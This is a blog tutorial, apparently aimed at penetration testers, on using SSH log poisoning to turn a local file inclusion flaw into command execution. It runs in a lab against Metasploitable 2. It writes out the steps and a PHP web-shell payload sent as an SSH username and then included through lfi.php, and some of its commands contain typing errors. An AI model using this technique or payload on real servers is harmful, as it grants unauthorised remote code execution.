Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

Web Server Exploitation with SSH Log Poisoning through LFI

$
0
0

In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack first you need to read my previous article which will help you to create local file inclusion vulnerability manually.

Attacker: Kali Linux

Target: Metasploitable 2

Open terminal in your kali Linux and connect the target using SSH service

ssh msfadmin@192.168.1.105

 From screenshot you can see I am connected with target PC, now type following command to check the permission for auth.log file

Ls –l /var/log/auth.log

Now if you notice the given screenshot again you will find that the highlighted text is showing read write permission had been given to auth.log file.

Since we know that the auth.log file has read permission therefore type following command to view its logs.

Tail –f /var/log/auth.log

 The highlighted text is showing the log for the valid user msfadmin.

Now open another terminal in kali where I will try to connect with web server using fake user name and then confirm whether any log is generated inside auth.log file for invalid user or not.

ssh hacker@192.168.1.105

When you move back to your previous terminal you find it has created a log for invalid user hacker which you can also check in the given screenshot.

Hence it is confirm that auth.log file generates log for every failed and pass login when we try to connect with web server. Taking advantage of this feature now I will send PHP code as fake user and it will get added automatically in auth.log file as new log.

Ssh <?php system($_GET[‘c’]); ?>’@192.168.1.105

Again when you check its log, you will find the PHP code has been added as new log.

Since I have already created LFI vulnerability manually inside the web server, so if you want to create LFI vulnerability view above link of previous article.

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

 

 

Now include the auth.log file as file parameter and give following URL inside browser.

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

From screenshot you can read the warning cannot execute blank command, it means our PHP code which was containing CMD comment is successfully injected now only we need to send any command as parameter

Here it will dump the data of auth log as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same way execute pwd through cmd and view the result from inside the given screenshot.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Web Server Exploitation with SSH Log Poisoning through LFI appeared first on Hacking Articles.


Viewing all articles
Browse latest Browse all 812

Trending Articles